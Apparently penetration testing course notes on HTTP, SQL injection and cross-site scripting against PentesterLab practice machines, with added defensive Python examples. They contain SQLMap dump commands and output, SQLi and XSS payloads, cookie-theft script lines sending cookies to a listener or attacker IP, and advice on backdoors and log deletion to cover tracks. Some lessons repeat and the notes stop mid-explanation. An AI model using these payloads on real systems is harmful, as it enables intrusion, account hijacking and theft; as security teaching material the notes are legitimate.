Introduction
In the previous video we examined packets. We continue the discussion of web communications by taking a look at the core protocols of web app communications: HTTP and HTTPS.
HTTP consists of various types of requests, the key ones being GET, HEAD, DELETE, POST, and PUT. The TCP port for HTTP is port 80.
The secure version of web app communications is HTTPS, which communicates over TCP port 443. It uses SSL/TLS certificates granted by a certificate authority to vouch for the site owner's identity. It also encrypts the data going across the connection for additional security.
Tools
In this video we go over the essential tools that are part of the web app pentester's tool kit. The core testing platform is a virtualized environment – either VMware or VirtualBox – running Kali Linux.
The tools discussed are:
- Vega web vulnerability scanner.
- BurpSuite web vulnerability scanner.
- SQLMap automatic SQL injection and database enumeration tool.
- Arachni web app attack and audit framework.
- W3AF network fuzzer.
- Nikto open source web server scanner.
- SearchSploit database exploit tool.
- NMAP network discovery and mapping tool.
Packets
Packets are the essence of web communications and in this video we talk about packet basics and how they can be manipulated to attack and exploit web apps.
We talk about what a packet is, what makes up a packet in terms of its fields, and how to capture packet data using packet sniffing tools such as Wireshark.
In addition, we examine packet responses in the form of HTML status codes. Finally, the importance of packets in web app exploits is discussed with regard to hidden HTML form fields and how apps are tricked into giving up sensitive information via packet manipulation. An example of such manipulation is the creation of fake browser cookies.
What is a packet? A packet is a unit of data which is transported across networks to facilitate communications between hosts. A packet is how we browse the web, stream movies, send text messages, and do everything else on the Internet.
HTTP Notes
In the previous video we examined packets. We continue the discussion of web communications by taking a look at the core protocols of web app communications: HTTP and HTTPS.
HTTP consists of various types of requests, the key ones being GET (retrieves data), HEAD (used to get metadata), DELETE (deletes resources off a server), POST (used for submission of web forms), and PUT (used to push a resource to a web server).
The TCP port for HTTP is port 80.
Sent status codes:
- 1xx - informational
- 2xx - success codes (200 - OK)
- 3xx - redirection (301 - moved permanently)
- 4xx - client error (404 - not found)
- 5xx - server error (503 - service unavailable)
HTTPS: port 443, SSL/TLS, uses certificates from a certificate authority (SSL certificates are exchanged, encryption keys are exchanged).
HTTPS prevents man-in-the-middle attacks and prevents eavesdropping by packet analysis tools.
Why Sites Get Hacked 1:
These are actually a series of steps which comprise the hacker methodology.
The primary reason websites are hacked is because they present a large attack surface. Web apps are software projects that are subject to the vulnerabilities of poor coding practices that result from inadequately trained developers, typically working under time constraints where the priority is to ship product. Security is usually not a priority and is often an afterthought.
Footprinting, where the terrain of a webserver is identified, is the first step in the hacker methodology. This is accomplished via ping sweeps, Google dorking, and Whois and Web Archive lookups.
The increase in information available online and increased vulnerabilities make websites easy prey for attackers.
Attacks: XSS (used to inject code into a website and bypass access controls), SQLi (used to enumerate databases), LFI (an attacker is able to traverse a file system), RFI (an attacker can execute a remote file on a webserver to steal data), URL manipulation (used to gain access or information from a website when poor user controls are in place).
Footprinting - ping sweeps, whois, Google hacking/dorking, the Internet Time Machine (https://archive.org/web/)
Why Sites Get Hacked 2
The next step in planning an attack is to enumerate the various ports, IP addresses, OSes, services, and software versions running within a target's environment. This is performed in order to uncover potential vulnerabilities which can then be exploited.
Tools used in this step include NMAP, Armitage, and ZenMap.
Scanning and enumeration:
- ports, IP addresses, OS, services
- use Armitage to do a scan
nmap -A 192.168.1.10
ZenMap scanning
Why Sites Get Hacked 3:
After the network terrain has been mapped out, we need to start probing for vulnerabilities.
This is accomplished in two ways: manually and automatically via scanning. We talk about various manual methods along with several automated tools such as Nessus, Armitage, and SearchSploit.
#searchsploit Apache httpd
Enumeration:
You will need to probe for vulnerabilities. Once services have been mapped out, try default credentials to log on to them! You can check exploit databases to identify vulnerable versions of software!
Why Sites Get Hacked 4
Gaining access:
- Exploit published vulnerabilities for software versions running on the site.
- Gain access if a service is using default credentials.
- Exploit the weakest link: humans.
- Attempt a "Hail Mary" using Armitage
If a piece of software has a published vulnerability this can be used to gain access.
You can gain access if a service is using a default username and credentials. You can drop a USB thumb drive in the parking lot, with a backdoor, and wait for someone to plug it in.
If no default credentials or vulnerabilities are found, users can be targeted to gain access.
In Armitage, there's an option called Hail Mary, which will run all exploits at a machine. We could get an exploit/session or not. This could be useful in critical environments, such as a hospital, to test a system for exploits.
Maintaining access after it has been achieved. This is one of the more difficult steps in the methodology, as many red flags can potentially be raised, which can turn the tables and have the victim pursuing the attacker by directing pings at them!
An important step in not being discovered is the deletion of any artifacts left behind such as:
- Scheduled services
- Files
- Any user accounts that were created
- Logs
In order to best maintain access, scheduled services which will open a backdoor or communicate with a listener will need to be set up.
This can be performed manually or through a script which would be run once you gain access.
Finally you need to cover your tracks when you're on the target or have finished.
This can be accomplished through deletion of artifacts such as scheduled services, files, user accounts that have been created, and logs.
Best Practices:
As a professional web app pentester, you must conduct yourself and your activities in an organized and professional manner. This is extremely important since your activities are virtually indistinguishable from a real attacker's. The name of the game is to protect yourself!
Key components of pentesting best practices are:
- Gain written permission about what targets will be tested, how long the tests will be performed, and when things will be tested.
- Create documentation that records the tests, such as output from Wireshark and tcpdump along with logs about what you did.
- Build reports about what was discovered and how to fix the vulnerabilities.
- Establish a good working relationship with other departments to stave off any potential misunderstandings during testing.
IaaS, SaaS or PaaS -
If an online site is scanned and is hosted by another company, permission should be received from that company to allow the pentester to perform that activity.
Documentation should be maintained in order to protect yourself. As soon as you get on a network, anything that goes wrong will be blamed on you. Keeping proper documentation will give you the ability to identify what you did to harm the network or to protect yourself from accusations. This documentation should be automatic or manual.
Automatic: should be Wireshark or tcpdump. This type of documentation allows for accountability of what has happened over the network.
Manual: should include a list of all commands used, what time they were used, and what system they were used on.
Keep detailed documentation!
Building reports:
Reports should be comprehensive and easy for customers to understand.
There are key elements each report should include:
- the vulnerability type
- where it was found
- how it affects the customer
- suggested fix!!!! Know how to fix vulnerabilities!
Best Practices 2
In this second video on web app pentesting best practices, we talk about the important issue of when to test. This is important since the customer's operations can be negatively impacted as a result of your testing.
In the agreement discussed in the previous video about gaining permission, you will also need to specify when you will be testing. Testing that places a large load on a system should be performed off-hours, most typically at night. However, certain types of tests will need to be performed during normal operating hours in order to identify if the client is capable of detecting various kinds of attacks by way of their intrusion detection system.
When to test
- this should be placed in the agreement that is made prior to testing, because when to test is just as important as what to test, for a few reasons
- testing that places a large load on a system should be done at night. If the system goes down it gives the client time to bring it back up before normal hours.
- if a web app is developed correctly it can take a beating, but not all web apps are developed to handle large amounts of malicious traffic
- certain types of tests should be done during normal operating hours. This can be used to identify if the customer can catch the attack.
Working with other departments
- many times you will have to work with systems that are utilized and maintained by multiple departments
- it is important to develop relations with all the departments that your testing will affect
- if you fail to do so and something happens (such as the web app crashing), departments that are unsure of you may get aggressive and try to blame you even if you haven't even begun testing yet.
Environment Setup
- Kali 2.0
- Pentester Labs:
https://pentesterlab.com/exercises/
Download:
- from SQL injection to shell
- web for pentester
https://pentesterlab.com/exercises/web_for_pentester
https://pentesterlab.com/exercises/from_sqli_to_shell
MODULE 2
What is SQL Injection 1
This lesson covers SQL injection. In this lesson, participants learn about:
1. What is a SQL injection?
2. How it works
3. Types
4. Examples
A SQL injection is a form of attack which takes advantage of improperly filtered user input and uses that input to enumerate and manipulate a database. This lesson discusses two types of SQL injection, which are classic and blind. The instructor also offers examples of where to inject SQL.
What does it mean? It means that an attacker can use statements to send commands to a SQL database and get information back from it. An attacker could also use such statements to manipulate data in a database as well.
There are 2 types:
- Classic SQLi
- Blind SQL Injection
Classic SQLi
- this type occurs when escape characters are improperly filtered. Characters such as ' and ''.
The SQL command is then sent to the SQL application and the results are directly displayed to the attacker.
Classic SQLi uses WHERE clause modification and UNION operator injections to exploit the improper filtering.
Blind SQLi
This form of injection is the same as classic SQLi except the attacker is not able to directly see the results.
For web applications that need to be tested for blind SQLi, it is best to use automated tools.
These would be:
- BSQL Hacker
- SQLMap
- SQLNinja
- Mole
- SQLSus
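To make the classic SQLi mechanics concrete (WHERE clause modification and a UNION injection, beside the parameterised queries that stop both), here is an added example in Python over an in-memory SQLite table; it is not code from the course or the lab VM, and the table rows are constructed to resemble the lab's users table.

```python
import sqlite3


# Constructed sample data modelled on the lab's 'users' table (id, groupid, age, name, passwd).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, groupid INTEGER, age INTEGER, name TEXT, passwd TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, 10, 10, "admin", "admin"),
        (2, 0, 30, "root", "admin21"),
        (3, 2, 5, "user1", "secret"),
    ])
    return conn


def lookup_name_vulnerable(conn, name):
    # Classic SQLi: the value is concatenated into the statement, so a quote in the
    # input closes the string literal and the rest rewrites the WHERE clause.
    sql = "SELECT id, name FROM users WHERE name='" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_id_vulnerable(conn, id_value):
    # Unquoted numeric parameter, concatenated: a UNION appends attacker-chosen rows,
    # which is how the 1,2,3,4 placeholders get mapped onto real columns.
    sql = "SELECT id, groupid, age, name FROM users WHERE id=" + id_value
    return conn.execute(sql).fetchall()


def lookup_name_safe(conn, name):
    # Parameterised query: the driver passes the value separately from the SQL text,
    # so quotes inside it are data, never syntax. Nobody is literally named ' OR '1'='1.
    return conn.execute("SELECT id, name FROM users WHERE name=?", (name,)).fetchall()


def lookup_id_safe(conn, id_value):
    # Validate the type first, then bind: a string carrying UNION is rejected outright.
    try:
        id_int = int(id_value)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, groupid, age, name FROM users WHERE id=?", (id_int,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_name_vulnerable(db, "' OR '1'='1"))           # every row comes back
    print(lookup_id_vulnerable(db, "-1 UNION SELECT 1,2,3,4"))  # attacker-controlled row
    print(lookup_name_safe(db, "' OR '1'='1"))                 # []
    print(lookup_id_safe(db, "-1 UNION SELECT 1,2,3,4"))       # []
```

An unbalanced quote such as `'1` makes the vulnerable versions raise a database error, which is the same signal the manual discovery step later in these notes relies on.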
Spidering 1
This lesson covers spidering. Participants learn about:
1. What is spidering?
Spidering is a technique of mapping a website and identifying all the pages that are accessible to any user. It is done actively or passively!
Actively: the tool being used to spider clicks on every link and button and fills in every form field. The tool will continue to follow each page and not stop until told to do so.
This can be dangerous because it can be seen as an attack if the tool finds an admin page and submits a button that deletes users or deletes pages.
Passively:
When passive spidering occurs it acts like active, but it will stop at the next page. Passive tends to be safer than active.
Spidering should be done prior to testing for vulnerabilities on a webpage for a few important reasons.
- creating a website map gives automated tools the ability to identify every possible vulnerable page
- it also gives a tester a better picture of the website
- spidering can also identify pages that shouldn't be available to the average user, such as admin consoles, unfinished pages, or pages that contain sensitive data.
Spidering is an important tool when performing web app pentesting!
2. How to spider with BurpSuite
3. How to spider with ZAP
4. Spidering in other programs
Spidering is a technique used to map a web site and identify pages that all users have access to, and is done either actively or passively.
Spidering 2
This lesson offers step by step examples of active and passive spidering in BurpSuite. Using the Kali Linux environment, participants receive instructions in how to conduct active and passive spidering.
Set up your manual proxy configuration to 127.0.0.1:8080 in IceWeasel.
If you need to find the IP address of the VM, but don't have permissions, do a:
$sudo !!
to get the ifconfig of eth0!
You can turn off passive spidering in BurpSuite under the Spider tab and Options tab. Under Passive Spidering, uncheck "Passively spider as you browse"!
This lesson covers active and passive spidering using the Zed Attack Proxy (ZAP), under Web Application Analysis in Kali.
We will browse the site and OWASP ZAP will track our browsing!
Under Sites in ZAP, we can right click on the target site/IP (in the right pane) and select Attack - Spider. Down at the bottom under Processed we will find the results of our spidering.
Spidering 3:
This lesson covers commands for how to do spidering in SQLMap using the Python language. Participants learn about the following commands:
1. -u
2. --forms
3. --batch
4. --crawl
5. --level
6. --risk
SQLMap:
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --level=5 --risk=3
-u = URL
--forms = parse and test the forms found on the target URL
--batch = non-interactive mode; usually SQLMap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--level = different levels of tests, 1 is default and 5 is the most
--risk = different risk of tests, 1 is default and 3 is the most.
Discovering SQLi 1
This brief lesson offers an introduction into discovering SQL injections.
1. Why is it important?
2. Types of discovery
a. Manual discovery
b. Automated discovery
3. VEGA
4. SQLMAP
5. NMAP
6. ZAP
7. ARACHNI
1. If left untested a website could have vulnerabilities that are ticking time bombs.
An SQLi attack could allow an attacker to gain usernames, passwords, and other sensitive details about users.
With these details an attacker could escalate their privileges and set themselves up to do further harm.
If left undetected the attackers could steal data for extended periods of time (years).
2. Manual: if the website contains a page with a URL that looks like this, "http://www.example.com/page.php?id=1", the easiest way to test for a SQL injection is by doing the following.
ex:
http://www.example.com/page.php?ID='1
or
http://www.example.com/page.php?ID=1'
If you get an error such as the one below, it verifies there is a vulnerability.
Warning: MYSQL_FETCH_ARRAY(): supplied argument is not a valid MYSQL result resource in /EXAM/PLE/PUBLIC_HTML/EXAMPLE.php on line 5
Testing of form fields can be done as well.
- 'OR'1'='1
- see text file on external drive for more commands. Look up file name "Discovering SQLi 1"
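The same probes the manual discovery step sends are also visible on the defending side. As an added example (not from the course), the following Python scans constructed Apache access-log lines for the probe shapes described above, after URL-decoding each parameter, and recognises the MySQL warning in a constructed PHP error-log line; the log lines, IP addresses and paths are all made up for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines (not from the lab VM). The query strings reproduce the
# probe shapes described above: a stray quote on a numeric id, 'OR'1'='1, and a UNION SELECT.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /page.php?id=1' HTTP/1.1" 500 233
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /sqli/example1.php?name=%27OR%271%27=%271 HTTP/1.1" 200 4100
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /sqli/example4.php?id=-1%20UNION%20SELECT%201,2,3,4 HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:12:00:05 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 233
"""

# Constructed PHP error-log line of the kind the text says confirms the flaw.
ERROR_LOG_LINE = ("[Mon Jan 01 12:00:02 2024] PHP Warning:  mysql_fetch_array(): supplied argument "
                  "is not a valid MySQL result resource in /var/www/page.php on line 5")

# Common log format: ip ident user [time] "method target proto" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded parameter value.
PROBE_RULES = [
    ("quote_on_numeric_param", re.compile(r"^(?:'-?\d+|-?\d+')$")),          # id='1  or  id=1'
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.IGNORECASE)),   # 'OR'1'='1
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)),   # -1 UNION SELECT 1,2,3,4
]

ERROR_RE = re.compile(
    r"mysql_fetch_array\(\): supplied argument is not a valid MySQL result resource", re.IGNORECASE
)


def classify_value(value):
    """Names of the probe rules a decoded parameter value matches (empty list = benign)."""
    return [name for name, rx in PROBE_RULES if rx.search(value)]


def scan_access_log(text):
    """Return (ip, status, param, decoded_value, rules) for every parameter that looks like an SQLi probe."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl decodes %27 -> ' and %20 -> space, so encoded and raw probes are treated alike
        for param, value in parse_qsl(query, keep_blank_values=True):
            rules = classify_value(value)
            if rules:
                hits.append((m.group("ip"), int(m.group("status")), param, value, rules))
    return hits


def error_log_confirms_probe(line):
    """True when the application error log shows the MySQL warning the text uses as confirmation."""
    return bool(ERROR_RE.search(line))


if __name__ == "__main__":
    for hit in scan_access_log(ACCESS_LOG):
        print(hit)
    print(error_log_confirms_probe(ERROR_LOG_LINE))
```

A probe that is followed by a 500 response and the matching warning in the error log is the combination to alert on first: it means the query actually broke, not just that someone sent a quote.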
This lesson talks about automated types of discovery and teaches participants about the following variants and where to find them:
1. VEGA: Freeware and GUI-based, found on Kali 1 and 2
2. SQLMAP: Freeware and command line based, found on Kali 1 and 2
3. NMAP: Freeware and command line based, found on Kali 1 and 2
4. ZAP: Freeware and GUI-based, found on Kali 1 and 2
5. ARACHNI: Freeware and GUI-based, found via the Arachni Scanner web site
6. BurpSuite: Freeware and GUI-based, found on portswigger.net
This lesson specifically focuses on VEGA and offers participants step-by-step instruction in how to use it.
VEGA:
apt-get install vega
Then in Vega go to Scan - Start Scan, type the IP address, select the options for SQLi and go through the tutorial leaving everything as default.
Then we wait for the results and find out Vega found 11 vulnerabilities in the "Web for Pentesters" VM.
Discovering SQLI 3
This lesson covers commands for how to do spidering in SQLMap using the Python language:
1. -u
2. --forms
3. --batch
4. --crawl
5. --level
6. --risk
SQLMap:
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --level=5 --risk=3
-u = URL
--batch = non-interactive mode; usually SQLMap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--level = different levels of tests, 1 is default and 5 is the most
--risk = different risk of tests, 1 is default and 3 is the most.
Using the Kali environment, participants receive step by step instructions in how to conduct pen testing.
During SQLi scanning, we can press Ctrl+C and select option S or E to skip over certain scan types.
Discovering SQLI 4
This lesson offers step by step directions in how to perform a scan using NMAP.
NMAP can be used as a vulnerability scanner.
This lesson offers examples of scripts which can be used to accomplish this:
• -p = port number
• --script = calling a script from the library
• --script-args = lets you customize the script further
nmap -p80 --script=http-sql-injection --script-args=httpspider.maxpagecount=200 <target>
- we got the same results as with Vega, but we need to use multiple tools, and we need more details, and nmap cannot give us that!
Discovering SQLI 5
This lesson is about the ZAP attack proxy. Using the application, participants receive step by step instructions in how to spider a web page and then look at everything it has found. The ZAP attack proxy is able to attack any vulnerability that is present.
ZAP:
Scan again 192.168.2.119.
If you want to change the default policy, go to Analyse and click on Scan Policy Manager - Modify - Injection - Server Side Include - click on Default under Threshold to get a drop-down menu, to select between Default or Low, Medium, High, etc.
You can turn OFF the other options, and only turn on the scans that you want for the job.
Discovering SQLI 6
This lesson focuses on the Arachni free scanner. In this lesson, participants receive step by step instructions in how to cd into Arachni and use it to scan for vulnerabilities via the local host and admin account, using the target URL command to check for SQL injections, perform a direct scan and find examples of SQL injections. You can hit 'review' to see what was injected, what was sent, as well as the response (if any).
#apt-get install arachni
#apt-get update
Go to Web Application Analysis and look up Arachni. When you start it up it will run on http://localhost:9292
Username: admin@admin.admin
Password: administrator
Go to Scans and select New. Go through the wizard to set up your scan job.
You can also create additional Profiles for the types of scans you want to perform.
Exploiting SQLI 1
Exploiting SQL manually
Exploiting with tools: SQLMap, SQLSUS.
Manually:
We can use:
either SELECT * FROM USER WHERE NAME="ROOT"
or -1 UNION SELECT 1,2,3,4
or ' AND '1'='1
We can use 'OR'1'='1 in:
http://192.168.2.119/sqli/example1.php?name=%27OR%271%27=%271
to dump information in the browser about the database.
With the -1 UNION SELECT 1,2,3,4
you can start modifying the parameters 1,2,3,4 to dump columns.
It will be a slow process, but you won't be seen as much!
Exploiting SQLI 2
This lesson focuses on using SQLMap in Kali or Kali 2 to check a database, run a scan and find vulnerabilities.
SQLMap:
python sqlmap.py -u "http://www.example.com/page.php?id=1" --dbs
python sqlmap.py -u "http://www.example.com/page.php?id=1" --tables -D website
python sqlmap.py -u "http://www.example.com/page.php?id=1" --columns -D website -T users
python sqlmap.py -u "http://www.example.com/page.php?id=1" --dump -D website -T users
Exercise:
sqlmap -u "http://192.168.2.119/sqli/example4.php?id=2" --dbs
Result: we dumped 2 databases
[12:29:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.12
[12:29:31] [INFO] fetching database names
available databases [2]:
[*] exercises
[*] information_schema
Exploiting SQLI 3
This lesson focuses on how to check for tables in the database using SQLMap to check known vulnerable web pages.
python sqlmap.py -u "http://www.example.com/page.php?id=1" --tables -D website
Exercise:
sqlmap -u "http://192.168.2.119/sqli/example5.php?id=2" --tables -D exercises
Result:
[12:37:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.12
[12:37:24] [INFO] fetching tables for database: 'exercises'
Database: exercises
[1 table]
+-------+
| users |
+-------+
Exercise:
sqlmap -u "http://192.168.2.119/sqli/example5.php?id=2" --columns -D exercises -T users
Result:
[12:38:39] [INFO] fetching columns for table 'users' in database 'exercises'
Database: exercises
Table: users
[5 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| age     |             |
| groupid |             |
| id      |             |
| name    |             |
| passwd  |             |
+---------+-------------+
Exercise:
python sqlmap.py -u "http://www.example.com/page.php?id=1" --dump -D exercises -T users
Result:
[12:42:40] [INFO] fetching columns for table 'users' in database 'exercises'
[12:42:40] [INFO] fetching entries for table 'users' in database 'exercises'
[12:42:40] [INFO] analyzing table dump for possible password hashes
Database: exercises
Table: users
[4 entries]
+----+---------+-----+-------+---------+
| id | groupid | age | name  | passwd  |
+----+---------+-----+-------+---------+
| 1  | 10      | 10  | admin | admin   |
| 2  | 0       | 30  | root  | admin21 |
| 3  | 2       | 5   | user1 | secret  |
| 5  | 5       | 2   | user2 | azerty  |
+----+---------+-----+-------+---------+
Exploiting SQLI 4
This lesson focuses on using SQLSUS, which is found on the Kali 2 platform. In this lesson, participants learn how to use SQLSUS to create a config file, name the attack, nano the file and then use the config file to launch an attack against a vulnerable web page to find tables, columns and users.
SQLSUS:
sqlsus -g attack //create the config file
nano attack //edit it
$url_start="target" //change this inside of the attack config file
//replace target inside the double quotation marks with:
http://192.168.2.119/sqli/example5.php?id=2
sqlsus attack
start
get <item> //all available items we can get
get tables //we will get tables
get columns users //get columns
select * from users //get passwords
SQLI Lab
This brief lesson offers an introduction into the SQLi Lab which will focus on two things:
• Lab discovery (using either Vega or ZAP, scan the "SQL to Shell" webpage for a SQLi vulnerability)
• Lab exploitation (using SQLMap, exploit the web page which was identified in your scan). Dump the database and find the username and password for the web page.
http://192.168.2.8/cat.php?id=3%200%200%20-%20-
http://192.168.2.8/cat.php?id=3 0 0 - -
Check text file for results!
MODULE 3:
What is XSS 1
This lesson offers an introduction into cross site scripting, also called XSS.
XSS is a client side code vulnerability which allows an attacker to inject malicious scripts and can be used to obtain information from a compromised site. XSS is the most common vulnerability on web sites and there are 3 types: persistent, reflected and DOM-based. However, this lesson will only cover the persistent and reflected types.
This lesson discusses the following:
1. What is XSS?
- XSS is a client-side code vulnerability which allows the attacker to inject code which can execute malicious scripts
- this type of attack can be used to obtain cookies, session tokens, or other sensitive information used with a compromised site
- XSS is the most common vulnerability discovered and exploited on websites
- comes in 3 flavors which are persistent, reflected and DOM-based
- XSS can present a serious concern for websites which contain sensitive user data
2. Attack types?
The 3 different types of XSS are persistent, reflected and DOM-based, but we will only be covering the persistent and reflected types due to them being the most common.
Persistent:
- this form of XSS is the most dangerous
- saves code to the server and permanently delivers the attack (this can most commonly be found on forums and sites which allow users to post HTML formatted data)
Reflected:
- this is the most common type of XSS
- commonly found in HTTP query parameters or in HTML form submissions
- this type of attack is most commonly used with a URL that appears to be innocent but has an XSS attack located within the link
3. Attack examples
Create a simple alert box:
index.php?name=guest<script>alert('attacked')</script>
Send cookies to a listener:
<script>new Image().src="http://<attacker's IP address>/b.php?"+document.cookie;</script>
Call a script from an external source:
<script>document.write('<script src=http://example.com/xss.js></script>')</script>
4. Why is this dangerous?
XSS can be one of the more dangerous types of attacks due to what it can do.
If an IFRAME used by an advertiser is vulnerable to XSS then a large number of websites delivering that content directly become vulnerable.
It can also be used to steal cookies as well as gain control over a victim's browser via BeEF.
XSS can also be used to redirect users to a malicious page or convince a user to input their credentials into form fields generated by XSS.
5. Examples of existent globe attacks
To hold out continued...next exercise...
What is XSS 2
This lesson offers some examples of well-known XSS attacks, which include:
1. MySpace: This occurred in 2005 and involved the Samy worm
2. Facebook: This occurred in 2011 and used code to distribute malware, with the code below:
<iframe id="crazydavinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='just visited http://y.ahoo.it/dajeba wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>
3. Yahoo: This occurred in 2013 and involved cookie theft
A spam message with a short link to an apparently harmless MSNBC page led to account hijacking via cookie theft!
Discovering XSS 1
This lesson continues to cover XSS and focuses on discovering XSS with Vega. Participants receive step by step instructions on how to turn on the XSS injection checks before running a scan.
Discovering XSS with tools:
- Nmap
- Arachni
- Vega
- XSSer
Discovering XSS manually!
Prior to performing an automated scan, make sure the XSS injection check is selected in the Select Modules menu in Vega!
Discovering XSS 2
This lesson offers step by step instructions on how to use the Arachni tool in Kali to run an XSS check.
Web based tool:
localhost:9292
(must run as root)
Discovering XSS 3
This lesson is about discovering XSS using Nmap's http-stored-xss NSE script, which posts specially crafted strings to every form it discovers and then looks for them on the site's pages.
Use the Web for Pentesters virtual machine!
nmap -p80 --script http-stored-xss.nse <target>
This script will post specially crafted strings to every form it discovers. The httpspider.maxpagecount argument caps how many pages the spider visits; the two follow-on scripts check for DOM-based XSS and for the unescaped PHP_SELF pattern instead of stored XSS:
nmap -p80 --script http-stored-xss --script-args=httpspider.maxpagecount=200 192.168.2.119
nmap -p80 --script http-dombased-xss --script-args=httpspider.maxpagecount=200 192.168.2.119
nmap -p80 --script http-phpself-xss --script-args=httpspider.maxpagecount=200 192.168.2.119
Discovering XSS 4
This lesson offers step by step instructions on how to use XSSer to discover XSS.
xsser -c 100 --Cw=4 -u <target URL>
xsser -c100 --Cw=4 -u http://192.168.2.119
-c = number of pages to crawl
--Cw = depth of the crawler
-u = URL
Discovering XSS 5
This lesson discusses entering XSS strings manually, using a list of test strings against Web for Pentesters, to find vulnerabilities.
The simplest way to test for XSS is to enter the string below into a common input such as a URL parameter and check whether the alert box appears. If the string comes back in the page as &lt;script&gt; instead, the parameter is reflected but the output is encoded, and this payload will not execute:
<script>alert('PWN')</script>
example:
http://example.com/index.php?user=<script>alert('PWN')</script>
If you want to confirm that cookies are reachable from injected script on your application, you can use the string below:
<script>alert("cookie"+document.cookie)</script>
example:
http://example.com/index.php?user=<script>alert("cookie"+document.cookie)</script>
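The manual check above is "does the alert pop?". This added example (not from the course) does the same test programmatically and also distinguishes a live reflection from a harmless, entity-encoded echo. The three sample responses are constructed; probe_url() is a helper that assumes the target reflects the named GET parameter somewhere in the response body.

```python
# Added example, not part of the course notes: classify how a probe string is
# reflected in a response. Sample pages below are constructed.
import html
import urllib.parse
import urllib.request

PROBE = "<script>alert('PWN')</script>"


def classify_reflection(body: str, probe: str = PROBE) -> str:
    """Return 'raw', 'encoded' or 'absent' for how `probe` appears in `body`."""
    if probe in body:
        return "raw"          # markup intact: very likely exploitable
    if (html.escape(probe, quote=True) in body
            or html.escape(probe, quote=False) in body):
        return "encoded"      # echoed as text: output encoding is in place
    return "absent"           # not reflected (or transformed beyond recognition)


def build_test_url(base: str, param: str, probe: str = PROBE) -> str:
    """Put the probe into one query parameter of `base`, URL-encoded for transport."""
    parts = urllib.parse.urlsplit(base)
    query = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    query[param] = probe
    return urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query)))


def probe_url(base: str, param: str, fetch=None) -> str:
    """Fetch the test URL and classify the reflection. `fetch` defaults to urllib."""
    url = build_test_url(base, param)
    if fetch is None:
        def fetch(u):
            return urllib.request.urlopen(u, timeout=10).read().decode("utf-8", "replace")
    return classify_reflection(fetch(url))


# Constructed responses: a vulnerable page, a page that encodes its output,
# and a page that ignores the parameter entirely.
SAMPLE_PAGES = {
    "vulnerable": "<html><body>Hello <script>alert('PWN')</script></body></html>",
    "encoded": "<html><body>Hello &lt;script&gt;alert(&#x27;PWN&#x27;)&lt;/script&gt;</body></html>",
    "silent": "<html><body>Hello guest</body></html>",
}

if __name__ == "__main__":
    for name, body in SAMPLE_PAGES.items():
        print(f"{name:10s} -> {classify_reflection(body)}")
    print(build_test_url("http://example.com/index.php?user=guest", "user"))
    # offline run of the fetch path with a fake fetcher
    print(probe_url("http://example.com/index.php", "user",
                    fetch=lambda u: SAMPLE_PAGES["vulnerable"]))
```

A "raw" result means the markup survived, which is what the alert box demonstrates; an "encoded" result is the case the manual test silently misses, because nothing pops and the tester may move on without noting that the parameter is reflected at all. Reflection inside an attribute or a JavaScript string needs context-specific probes that this check does not cover.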
Discovering XSS 6
This brief lesson offers a demonstration of how to use document.cookie to read the cookies available to injected script.
example1.php?name=<script>alert(document.cookie)</script>
Exploiting XSS 1
This video covers exploiting cross site scripting: how to exploit XSS manually via redirection and cookie theft, as well as how to exploit XSS with BeEF.
How to exploit manually:
- redirection
- cookie theft
How to exploit XSS with BeEF!
Manually:
The same technique used to identify XSS can also be used to exploit it, except that some additional steps need to be taken.
First we have to decide what kind of attack we want to perform. Do we want to redirect the user to a malicious site, or do we want to steal data?
First we are going to cover XSS redirection!
Get the XSS VM from:
https://pentesterlab.com/exercises/xss_and_mysql_file/
Manual redirection (the src is not an image, so the onerror handler fires; this form also works where a filter strips <script> tags):
<img src="http://example.com" onerror="window.open('http://www.google.com','xss','height=500,width=500')">
Manual cookie theft:
Enter the string below into a field that is known to be vulnerable:
<script>new Image().src="http://listener-ip:port/b.php?"+document.cookie;</script>
<script>new Image().src="http://192.168.2.7:80/b.php?"+document.cookie;</script>
<script>new Image().src="http://<attacker's ip address>/b.php?"+document.cookie;</script>
Let's break this line down a bit:
- <script></script> - identifies the enclosed content as a script
- new Image().src= - creates an image object; assigning its src makes the browser request that URL immediately, without anything having to be inserted into the page
